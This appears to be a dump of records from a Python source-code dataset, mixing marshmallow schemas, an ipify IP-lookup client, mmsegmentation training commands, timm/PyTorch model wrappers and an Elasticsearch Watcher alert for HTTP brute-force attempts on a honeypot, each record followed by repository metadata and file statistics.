south_latitude = fields.Decimal(required=True)
east_longitude = fields.Decimal(required=True)
west_longitude = fields.Decimal(required=True)
city = fields.Nested(
'CityItemResponseSchema',
required=True)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of GridCell"""
return GridCell(**data)
class Meta:
ordered = True
class ResultCreateRequestSchema(Schema):
""" JSON serialization schema """
date = fields.DateTime(required=True)
updated = fields.DateTime(required=True)
value = fields.Float(required=False, allow_none=True)
grid_cell = fields.Nested(
'GridCellCreateRequestSchema',
required=True)
experiment = fields.Nested(
'ExperimentCreateRequestSchema',
required=True)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of Result"""
return Result(**data)
class Meta:
ordered = True
class ResultListResponseSchema(Schema):
""" JSON serialization schema """
value = fields.Float(required=False, allow_none=True)
grid_cell = fields.Nested(
'GridCellListResponseSchema',
required=True)
latitude = fields.Function(lambda x: float(
x.grid_cell.north_latitude + x.grid_cell.south_latitude) * .5)
longitude = fields.Function(lambda x: float(
x.grid_cell.east_longitude + x.grid_cell.west_longitude) * .5)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of Result"""
return Result(**data)
class Meta:
ordered = True
class ResultItemResponseSchema(Schema):
""" JSON serialization schema """
value = fields.Float(required=False, allow_none=True)
latitude = fields.Function(lambda x: float(
x.grid_cell.north_latitude + x.grid_cell.south_latitude) * .5)
longitude = fields.Function(lambda x: float(
x.grid_cell.east_longitude + x.grid_cell.west_longitude) * .5)
# noinspection PyUnresolvedReferences
@post_load
def make_object(self, data):
""" Deserialize data into an instance of Result"""
return Result(**data)
class Meta:
ordered = True
| 28.542969 | 70 | 0.671274 | 765 | 7,307 | 6.304575 | 0.134641 | 0.099523 | 0.057226 | 0.072154 | 0.790794 | 0.790794 | 0.790794 | 0.790794 | 0.790794 | 0.772548 | 0 | 0.00089 | 0.231422 | 7,307 | 255 | 71 | 28.654902 | 0.857906 | 0.184481 | 0 | 0.770186 | 0 | 0 | 0.036558 | 0.033454 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0.037267 | 0 | 0.658385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
2f4cde7df77316dc0b7e1f69eb69a7091bf31de9 | 205 | py | Python | bittrex_websocket/__init__.py | slazarov/bittrex-websocket | d2fd7d6ad4de440947ef10aa90d60e307c8f684c | [
"MIT"
] | 122 | 2017-11-25T02:11:22.000Z | 2021-11-22T17:46:11.000Z | bittrex_websocket/__init__.py | slazarov/bittrex-websocket | d2fd7d6ad4de440947ef10aa90d60e307c8f684c | [
"MIT"
] | 83 | 2017-11-29T16:04:40.000Z | 2021-01-31T00:12:33.000Z | bittrex_websocket/__init__.py | slazarov/bittrex-websocket | d2fd7d6ad4de440947ef10aa90d60e307c8f684c | [
"MIT"
] | 51 | 2017-11-28T20:59:14.000Z | 2021-05-27T06:13:11.000Z | from bittrex_websocket import _logger
from bittrex_websocket.websocket_client import BittrexSocket
from bittrex_websocket.order_book import OrderBook
from bittrex_websocket.constants import BittrexMethods
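# Minimal subscription sketch (assumption: callback/subscribe names follow the
# project README and may differ between library versions):
#
#   class MySocket(BittrexSocket):
#       def on_public(self, msg):
#           print(msg)
#
#   ws = MySocket()
#   ws.subscribe_to_exchange_deltas(['BTC-ETH'])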
| 41 | 60 | 0.907317 | 25 | 205 | 7.16 | 0.48 | 0.24581 | 0.446927 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078049 | 205 | 4 | 61 | 51.25 | 0.94709 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
2f74bc65612268f3f0da0cd7a54bd1566c55e52d | 128 | py | Python | src/blizz/check.py | joerg-schneider/blizz | d70ee069b2765a70286f2413f5624c4a2af9af1a | [
"MIT"
] | 5 | 2021-05-28T16:33:03.000Z | 2022-03-26T17:01:38.000Z | src/blizz/check.py | joerg-schneider/blizz | d70ee069b2765a70286f2413f5624c4a2af9af1a | [
"MIT"
] | 1 | 2021-06-01T12:41:56.000Z | 2021-06-03T11:30:51.000Z | src/blizz/check.py | joerg-schneider/blizz | d70ee069b2765a70286f2413f5624c4a2af9af1a | [
"MIT"
] | null | null | null | from blizz._check import types, fields, keys, func, RAISE, WARN
__all__ = ["types", "fields", "keys", "func", "RAISE", "WARN"]
| 32 | 63 | 0.65625 | 17 | 128 | 4.647059 | 0.647059 | 0.278481 | 0.379747 | 0.481013 | 0.708861 | 0.708861 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140625 | 128 | 3 | 64 | 42.666667 | 0.718182 | 0 | 0 | 0 | 0 | 0 | 0.21875 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
2f8765cae27b303b14abbba4b622cafdf8c728b4 | 65 | py | Python | core/modules/optims/__init__.py | FelixFu520/DAO | ac30bad4503408e771bc28c77dd8a20c18c15a05 | [
"MIT"
] | null | null | null | core/modules/optims/__init__.py | FelixFu520/DAO | ac30bad4503408e771bc28c77dd8a20c18c15a05 | [
"MIT"
] | null | null | null | core/modules/optims/__init__.py | FelixFu520/DAO | ac30bad4503408e771bc28c77dd8a20c18c15a05 | [
"MIT"
] | null | null | null | from .sgd_warmup_bias_bn_weight import sgd_warmup_bias_bn_weight
| 32.5 | 64 | 0.923077 | 12 | 65 | 4.333333 | 0.583333 | 0.346154 | 0.5 | 0.576923 | 0.807692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.061538 | 65 | 1 | 65 | 65 | 0.852459 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
85e87708e9f88db0246684ceffb066a8e35aef1a | 3,547 | py | Python | includes/ipify.py | z1pti3/jimiPlugin-ipify | 88e83314fd3238e1f753d281aea2567ead07b662 | [
"Apache-2.0"
] | null | null | null | includes/ipify.py | z1pti3/jimiPlugin-ipify | 88e83314fd3238e1f753d281aea2567ead07b662 | [
"Apache-2.0"
] | null | null | null | includes/ipify.py | z1pti3/jimiPlugin-ipify | 88e83314fd3238e1f753d281aea2567ead07b662 | [
"Apache-2.0"
] | null | null | null | import requests
import json
from pathlib import Path
# Gets your current IPv4 / IPv6 address
class _ipify():
apiAddress = "https://api64.ipify.org"
def __init__(self, ca=None, requestTimeout=15):
self.requestTimeout = requestTimeout
if ca != None:
if type(ca) is str:
self.ca = str(Path(ca))
elif type(ca) is bool:
self.ca = ca
else:
self.ca = None
    def apiCall(self, endpoint, method="GET", data=None):
kwargs={}
kwargs["timeout"] = self.requestTimeout
if self.ca != None:
kwargs["verify"] = self.ca
try:
url = "{0}/{1}".format(self.apiAddress,endpoint)
            if method == "GET":
                response = requests.get(url, **kwargs)
            else:
                return 0, "Unsupported method - {0}".format(method)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
return 0, "Connection Timeout - {0}".format(e)
return response.status_code, json.loads(response.text)
def getMyIPAddress(self):
statusCode, response = self.apiCall("?format=json")
if statusCode == 200:
return response["ip"]
return None
# Gets IP geolocation information
class _geoipify():
apiAddress = "https://geo.ipify.org/api/v1"
def __init__(self, apiToken, ca=None, requestTimeout=15):
self.apiToken = apiToken
self.requestTimeout = requestTimeout
if ca != None:
if type(ca) is str:
self.ca = str(Path(ca))
elif type(ca) is bool:
self.ca = ca
else:
self.ca = None
    def apiCall(self, endpoint, method="GET", data=None):
kwargs={}
kwargs["timeout"] = self.requestTimeout
if self.ca != None:
kwargs["verify"] = self.ca
try:
url = "{0}?apiKey={1}&{2}".format(self.apiAddress,self.apiToken,endpoint)
            if method == "GET":
                response = requests.get(url, **kwargs)
            else:
                return 0, "Unsupported method - {0}".format(method)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
return 0, "Connection Timeout - {0}".format(e)
return response.status_code, json.loads(response.text)
def geoIPLookup(self,ip):
statusCode, response = self.apiCall("ipAddress={0}".format(ip))
return statusCode, response
# Detects proxy, vpn / tor addresses from ip
class _proxyipify():
apiAddress = "https://vpn-proxy-detection.ipify.org/api/v1"
def __init__(self, apiToken, ca=None, requestTimeout=15):
self.apiToken = apiToken
self.requestTimeout = requestTimeout
if ca != None:
if type(ca) is str:
self.ca = str(Path(ca))
elif type(ca) is bool:
self.ca = ca
else:
self.ca = None
    def apiCall(self, endpoint, method="GET", data=None):
kwargs={}
kwargs["timeout"] = self.requestTimeout
if self.ca != None:
kwargs["verify"] = self.ca
try:
url = "{0}?apiKey={1}&{2}".format(self.apiAddress,self.apiToken,endpoint)
            if method == "GET":
                response = requests.get(url, **kwargs)
            else:
                return 0, "Unsupported method - {0}".format(method)
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
return 0, "Connection Timeout - {0}".format(e)
return response.status_code, json.loads(response.text)
def proxyDetect(self,ip):
statusCode, response = self.apiCall("ipAddress={0}".format(ip))
return statusCode, response
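# Usage sketch (assumptions: outbound network access to the ipify endpoints;
# the geo/proxy classes additionally require a valid ipify API token):
#   client = _ipify()
#   print(client.getMyIPAddress())
#   geo = _geoipify(apiToken="YOUR_TOKEN")        # hypothetical token
#   status, info = geo.geoIPLookup("8.8.8.8")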
| 35.118812 | 87 | 0.581618 | 403 | 3,547 | 5.074442 | 0.19603 | 0.046944 | 0.03423 | 0.032274 | 0.806357 | 0.795599 | 0.795599 | 0.795599 | 0.795599 | 0.795599 | 0 | 0.01239 | 0.294615 | 3,547 | 100 | 88 | 35.47 | 0.804956 | 0.029321 | 0 | 0.788235 | 0 | 0 | 0.08927 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105882 | false | 0 | 0.035294 | 0 | 0.329412 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
85f2299ba588599ddec5e0c6b1686631f6b81de2 | 2,391 | py | Python | auto_training.py | CheungBH/mmsegmentation | 9d72a35ad6d6df499dc6b61eb441b0646f35db18 | [
"Apache-2.0"
] | null | null | null | auto_training.py | CheungBH/mmsegmentation | 9d72a35ad6d6df499dc6b61eb441b0646f35db18 | [
"Apache-2.0"
] | null | null | null | auto_training.py | CheungBH/mmsegmentation | 9d72a35ad6d6df499dc6b61eb441b0646f35db18 | [
"Apache-2.0"
] | null | null | null | import os
configs = [
# "CUDA_VISIBLE_DEVICES=3 ./tools/dist_train.sh configs/ccnet/ccnet_r50-d8_512x512_20k_voc12aug.py 1",
# "CUDA_VISIBLE_DEVICES=3 ./tools/dist_train.sh configs/apcnet/apcnet_r50-d8_512x512_80k_ade20k.py 1",
# "CUDA_VISIBLE_DEVICES=3 ./tools/dist_train.sh configs/ann/ann_r50-d8_512x512_20k_voc12aug.py 1",
# "CUDA_VISIBLE_DEVICES=3 ./tools/dist_train.sh configs/danet/danet_r50-d8_512x512_20k_voc12aug.py 1",
# "CUDA_VISIBLE_DEVICES=3 ./tools/dist_train.sh configs/ccnet/ccnet_r50-d8_512x512_20k_voc12aug.py 1",
# "CUDA_VISIBLE_DEVICES=3 ./tools/dist_train.sh configs/deeplabv3/deeplabv3_r50-d8_512x512_20k_voc12aug.py 1",
# "CUDA_VISIBLE_DEVICES=3 ./tools/dist_train.sh configs/danet/danet_r50-d8_512x1024_40k_cityscapes.py 1",
# "CUDA_VISIBLE_DEVICES=3 ./tools/dist_train.sh configs/dnlnet/dnl_r50-d8_512x1024_40k_cityscapes.py 1",
# "CUDA_VISIBLE_DEVICES=3 ./tools/dist_train.sh configs/emanet/emanet_r50-d8_512x1024_80k_cityscapes.py 1",
# "PORT=13213 CUDA_VISIBLE_DEVICES=2 ./tools/dist_train.sh configs/encnet/encnet_r50-d8_512x512_20k_voc12aug.py 1",
# "PORT=13213 CUDA_VISIBLE_DEVICES=2 ./tools/dist_train.sh configs/encnet/encnet_r50-d8_512x1024_40k_cityscapes.py 1",
# "PORT=13213 CUDA_VISIBLE_DEVICES=2 ./tools/dist_train.sh configs/fastscnn/fast_scnn_4x8_80k_lr0.12_cityscapes.py 1",
# "PORT=13213 CUDA_VISIBLE_DEVICES=2 ./tools/dist_train.sh configs/gcnet/gcnet_r50-d8_512x512_20k_voc12aug.py 1",
# "PORT=13213 CUDA_VISIBLE_DEVICES=2 ./tools/dist_train.sh configs/gcnet/gcnet_r50-d8_512x1024_40k_cityscapes.py 1",
"PORT=12451 CUDA_VISIBLE_DEVICES=0 ./tools/dist_train.sh configs/hrnet/fcn_hr18_480x480_40k_pascal_context.py 1",
"PORT=12451 CUDA_VISIBLE_DEVICES=0 ./tools/dist_train.sh configs/hrnet/fcn_hr18_480x480_40k_pascal_context.py 1",
"PORT=12451 CUDA_VISIBLE_DEVICES=0 ./tools/dist_train.sh configs/nonlocal_net/nonlocal_r50-d8_512x512_20k_voc12aug.py 1",
"PORT=12451 CUDA_VISIBLE_DEVICES=0 ./tools/dist_train.sh configs/nonlocal_net/nonlocal_r50-d8_512x1024_40k_cityscapes.py 1",
"PORT=12451 CUDA_VISIBLE_DEVICES=0 ./tools/dist_train.sh configs/point_rend/pointrend_r50_512x1024_80k_cityscapes.py 1",
]
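# Run every sweep entry sequentially; os.system's return code is ignored here,
# so a failing command will not stop the remaining runs.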
for idx, cmd in enumerate(configs):
print("--------------------------Training model {}--------------------------".format(idx))
print(cmd)
os.system(cmd) | 77.129032 | 128 | 0.778335 | 384 | 2,391 | 4.484375 | 0.169271 | 0.121371 | 0.198606 | 0.176539 | 0.872822 | 0.852497 | 0.852497 | 0.852497 | 0.835656 | 0.835656 | 0 | 0.145213 | 0.086993 | 2,391 | 31 | 129 | 77.129032 | 0.64361 | 0.626098 | 0 | 0.166667 | 0 | 0.166667 | 0.732955 | 0.639773 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.083333 | 0.166667 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
c08774513db925b9cacb98eff6b1a5b0f1dd7d95 | 14,958 | py | Python | baseline/models/model.py | haymrpig/Pytorch_template | 9a0eda43b2da27807461b305ed42e1bd7c1341dd | [
"MIT"
] | null | null | null | baseline/models/model.py | haymrpig/Pytorch_template | 9a0eda43b2da27807461b305ed42e1bd7c1341dd | [
"MIT"
] | null | null | null | baseline/models/model.py | haymrpig/Pytorch_template | 9a0eda43b2da27807461b305ed42e1bd7c1341dd | [
"MIT"
] | null | null | null | import timm
import torch.nn as nn
import torchvision.models as models
# required by efficientnet_b5 below (pip install efficientnet_pytorch)
from efficientnet_pytorch import EfficientNet
_all_models=["resnet18", "mnasnet1_0", "wide_resnet50_2", "resnext50_32x4d", "mobilenet_v2",
"googlenet", "inception_v3", "densenet161", "squeezenet1_0", "vgg16",
'efficientnet_b0', 'efficientnet_b1', 'efficientnet_b2', 'efficientnet_b3',
'efficientnet_b3_pruned', 'efficientnet_b4', 'efficientnet_b5', 'efficientnet_b6',
'efficientnet_b7', 'efficientnet_b8']
def callModel(model, pretrained=True, num_classes=18, freeze=False):
if model in dir(timm.models):
model = timm.create_model(model, pretrained=pretrained, num_classes=num_classes)
else:
raise ValueError(f'{model} does not exist in timm library')
return model
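# Usage sketch (assumption: the requested architecture is registered in the
# installed timm version):
#   net = callModel('efficientnet_b0', pretrained=False, num_classes=18)
#   logits = net(torch.randn(2, 3, 224, 224))     # -> shape (2, 18)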
class resnet18(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = models.resnet18(pretrained = self.pretrained)
self.in_features = self.model.fc.in_features
self.model.fc = nn.Linear(self.in_features, num_classes)
self.num_classes = num_classes
def forward(self, x):
x = self.model(x)
return x
class mnasnet1_0(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = models.mnasnet1_0(pretrained = self.pretrained)
self.in_features = self.model.classifier[1].out_features
self.num_classes = num_classes
self.layer = nn.Sequential(
nn.ReLU(inplace=True),
nn.Linear(self.in_features, 512),
nn.ReLU(inplace=True),
nn.Linear(512, self.num_classes),
)
def forward(self, x):
x = self.model(x)
x = self.layer(x)
return x
class wide_resnet50_2(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = models.wide_resnet50_2(pretrained = self.pretrained)
self.in_features = self.model.fc.out_features
self.num_classes = num_classes
self.layer = nn.Sequential(
nn.ReLU(inplace=True),
nn.Linear(self.in_features, 512),
nn.ReLU(inplace=True),
nn.Linear(512, self.num_classes),
)
def forward(self, x):
x = self.model(x)
x = self.layer(x)
return x
class resnext50_32x4d(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = models.resnext50_32x4d(pretrained = self.pretrained)
self.in_features = self.model.fc.out_features
self.num_classes = num_classes
self.layer = nn.Sequential(
nn.ReLU(inplace=True),
nn.Linear(self.in_features, 512),
nn.ReLU(inplace=True),
nn.Linear(512, self.num_classes),
)
def forward(self, x):
x = self.model(x)
x = self.layer(x)
return x
class mobilenet_v2(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = models.mobilenet_v2(pretrained = self.pretrained)
self.in_features = self.model.classifier[1].out_features
self.num_classes = num_classes
self.layer = nn.Sequential(
nn.ReLU(inplace=True),
nn.Linear(self.in_features, 512),
nn.ReLU(inplace=True),
nn.Linear(512, self.num_classes),
)
def forward(self, x):
x = self.model(x)
x = self.layer(x)
return x
class googlenet(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = models.googlenet(pretrained = self.pretrained)
self.in_features = self.model.fc.out_features
self.num_classes = num_classes
self.layer = nn.Sequential(
nn.ReLU(inplace=True),
nn.Linear(self.in_features, 512),
nn.ReLU(inplace=True),
nn.Linear(512, self.num_classes),
)
def forward(self, x):
x = self.model(x)
x = self.layer(x)
return x
class inception_v3(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = models.inception_v3(pretrained = self.pretrained)
self.in_features = self.model.fc.out_features
self.num_classes = num_classes
self.layer = nn.Sequential(
nn.ReLU(inplace=True),
nn.Linear(self.in_features, 512),
nn.ReLU(inplace=True),
nn.Linear(512, self.num_classes),
)
def forward(self, x):
x = self.model(x)
x = self.layer(x)
return x
class densenet161(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = models.densenet161(pretrained = self.pretrained)
self.in_features = self.model.classifier.out_features
self.num_classes = num_classes
self.layer = nn.Sequential(
nn.ReLU(inplace=True),
nn.Linear(self.in_features, 512),
nn.ReLU(inplace=True),
nn.Linear(512, self.num_classes),
)
def forward(self, x):
x = self.model(x)
x = self.layer(x)
return x
class squeezenet1_0(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = models.squeezenet1_0(pretrained = self.pretrained)
self.in_features = self.model.classifier[1].in_channels
self.num_classes = num_classes
        self.model.classifier[1] = nn.Conv2d(self.in_features, num_classes, kernel_size=1)
def forward(self, x):
x = self.model(x)
return x
class vgg16(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = models.vgg16(pretrained = self.pretrained)
self.in_features = self.model.classifier[6].out_features
self.num_classes = num_classes
self.layer = nn.Sequential(
nn.ReLU(inplace=True),
nn.Linear(self.in_features, 512),
nn.ReLU(inplace=True),
nn.Linear(512, self.num_classes),
)
def forward(self, x):
x = self.model(x)
x = self.layer(x)
return x
class efficientnet_b0(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
        self.model = timm.create_model('efficientnet_b0', num_classes=num_classes, pretrained=self.pretrained)
# self.in_features = self.model.classifier.out_features
# self.num_classes = num_classes
# self.layer = nn.Sequential(
# nn.ReLU(inplace=True),
# nn.Linear(self.in_features, 512),
# nn.ReLU(inplace=True),
# nn.Linear(512, self.num_classes),
# )
def forward(self, x):
x = self.model(x)
#x = self.layer(x)
return x
class efficientnet_b1(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
        self.model = timm.create_model('efficientnet_b1', num_classes=num_classes, pretrained=self.pretrained)
# self.in_features = self.model.classifier.out_features
# self.num_classes = num_classes
# self.layer = nn.Sequential(
# nn.ReLU(inplace=True),
# nn.Linear(self.in_features, 512),
# nn.ReLU(inplace=True),
# nn.Linear(512, self.num_classes),
# )
def forward(self, x):
x = self.model(x)
#x = self.layer(x)
return x
class efficientnet_b2(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = timm.create_model('efficientnet_b2', num_classes=num_classes, pretrained = self.pretrained)
# self.in_features = self.model.classifier.out_features
# self.num_classes = num_classes
# self.layer = nn.Sequential(
# nn.ReLU(inplace=True),
# nn.Linear(self.in_features, 512),
# nn.ReLU(inplace=True),
# nn.Linear(512, self.num_classes),
# )
def forward(self, x):
x = self.model(x)
#x = self.layer(x)
return x
class efficientnet_b3(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = timm.create_model('efficientnet_b3', num_classes=num_classes, pretrained = self.pretrained)
# self.in_features = self.model.classifier.out_features
# self.num_classes = num_classes
# self.layer = nn.Sequential(
# nn.ReLU(inplace=True),
# nn.Linear(self.in_features, 512),
# nn.ReLU(inplace=True),
# nn.Linear(512, self.num_classes),
# )
def forward(self, x):
x = self.model(x)
#x = self.layer(x)
return x
class efficientnet_b3_pruned(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = timm.create_model('efficientnet_b3_pruned', num_classes=num_classes, pretrained = self.pretrained)
def forward(self, x):
x = self.model(x)
return x
class efficientnet_b3_pruned_multihead(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.freeze = freeze
self.model = timm.create_model('efficientnet_b3_pruned', pretrained = self.pretrained)
if self.freeze:
for param in self.model.parameters():
param.requires_grad=False
self.features = self.model.num_features
self.age_layer = timm.models.layers.ClassifierHead(self.features,3)
self.mask_layer = timm.models.layers.ClassifierHead(self.features,3)
self.gender_layer = timm.models.layers.ClassifierHead(self.features,2)
def forward(self, x):
x = self.model.forward_features(x)
age = self.age_layer(x)
mask = self.mask_layer(x)
gender = self.gender_layer(x)
return age, mask, gender
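# Usage sketch for the multi-head variant (assumption: 3-channel image input;
# spatial size is flexible thanks to the global pooling in ClassifierHead):
#   net = efficientnet_b3_pruned_multihead(pretrained=False)
#   age, mask, gender = net(torch.randn(2, 3, 224, 224))
#   # age: (2, 3) logits, mask: (2, 3) logits, gender: (2, 2) logits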
class efficientnet_b4(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = timm.create_model('efficientnet_b4', num_classes=num_classes, pretrained = self.pretrained)
# self.in_features = self.model.classifier.out_features
# self.num_classes = num_classes
# self.layer = nn.Sequential(
# nn.ReLU(inplace=True),
# nn.Linear(self.in_features, 512),
# nn.ReLU(inplace=True),
# nn.Linear(512, self.num_classes),
# )
def forward(self, x):
x = self.model(x)
#x = self.layer(x)
return x
class efficientnet_b5(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = EfficientNet.from_pretrained("efficientnet-b5")
self.in_features = self.model._fc.in_features
self.num_classes = num_classes
self.model._fc = nn.Linear(self.in_features, num_classes)
# self.layer = nn.Sequential(
# nn.ReLU(inplace=True),
# nn.Linear(self.in_features, 512),
# nn.ReLU(inplace=True),
# nn.Linear(512, self.num_classes),
# )
def forward(self, x):
x = self.model(x)
#x = self.layer(x)
return x
class efficientnet_b6(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = timm.create_model('efficientnet_b6', num_classes=num_classes, pretrained = self.pretrained)
# self.in_features = self.model.classifier.out_features
# self.num_classes = num_classes
# self.layer = nn.Sequential(
# nn.ReLU(inplace=True),
# nn.Linear(self.in_features, 512),
# nn.ReLU(inplace=True),
# nn.Linear(512, self.num_classes),
# )
def forward(self, x):
x = self.model(x)
#x = self.layer(x)
return x
class efficientnet_b7(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = timm.create_model('efficientnet_b7', num_classes=num_classes, pretrained = self.pretrained)
# self.in_features = self.model.classifier.out_features
# self.num_classes = num_classes
# self.layer = nn.Sequential(
# nn.ReLU(inplace=True),
# nn.Linear(self.in_features, 512),
# nn.ReLU(inplace=True),
# nn.Linear(512, self.num_classes),
# )
def forward(self, x):
x = self.model(x)
#x = self.layer(x)
return x
class efficientnet_b8(nn.Module):
def __init__(self, pretrained=True, num_classes=3, freeze=False):
super().__init__()
self.pretrained = pretrained
self.model = timm.create_model('efficientnet_b8', num_classes=num_classes, pretrained = self.pretrained)
# self.in_features = self.model.classifier.out_features
# self.num_classes = num_classes
# self.layer = nn.Sequential(
# nn.ReLU(inplace=True),
# nn.Linear(self.in_features, 512),
# nn.ReLU(inplace=True),
# nn.Linear(512, self.num_classes),
# )
def forward(self, x):
x = self.model(x)
#x = self.layer(x)
return x
| 35.699284 | 119 | 0.617128 | 1,834 | 14,958 | 4.802072 | 0.050164 | 0.115817 | 0.089928 | 0.06563 | 0.881912 | 0.880777 | 0.880777 | 0.863745 | 0.858067 | 0.828659 | 0 | 0.021927 | 0.265209 | 14,958 | 418 | 120 | 35.784689 | 0.779365 | 0.152494 | 0 | 0.715789 | 0 | 0 | 0.038422 | 0.005239 | 0 | 0 | 0 | 0 | 0 | 1 | 0.157895 | false | 0 | 0.010526 | 0 | 0.326316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c08b6e754ff0392ded0450a2f3b96ecef0700391 | 10,992 | py | Python | honeygrove_adapter/es_watcher.py | UHH-ISS/honeygrove-cim | 6cf3f82cdb398c0b67cee9adea3415367f3553b0 | [
"MIT"
] | 2 | 2019-03-12T16:35:27.000Z | 2019-03-21T21:06:58.000Z | honeygrove_adapter/es_watcher.py | UHH-ISS/honeygrove-cim | 6cf3f82cdb398c0b67cee9adea3415367f3553b0 | [
"MIT"
] | null | null | null | honeygrove_adapter/es_watcher.py | UHH-ISS/honeygrove-cim | 6cf3f82cdb398c0b67cee9adea3415367f3553b0 | [
"MIT"
] | null | null | null | from elasticsearch.client.xpack.watcher import WatcherClient
class ESWatcher():
watcher = None
mattermost_url = None
def __init__(self, es, url):
self.watcher = WatcherClient(es)
self.mattermost_url = url
# Watcher alerts
def put_watch(self):
# HTTP brute force alert
self.watcher.put_watch(
id='brute_force_http',
body={
# Run the watch every 10 seconds
'trigger': {'schedule': {'interval': '10s'}},
# The search request to execute
'input': {
'search': {
'request': {
'indices': ['honeygrove'],
'body': {
'query': {
'bool': {
'must': [
{'match': {'service': "HTTP"}},
{'match': {'successful': "false"}}],
'filter': {
'range': {
'@timestamp': {
'from': 'now-10s',
'to': 'now'}}}}}}}}},
# Search for at least 100 logs matching the condition
'condition': {
'compare': {
'ctx.payload.hits.total': {
'gt': 100}}},
# The actions to perform
'actions': {
'mattermost_webhook': {
'webhook': {
'method': 'POST',
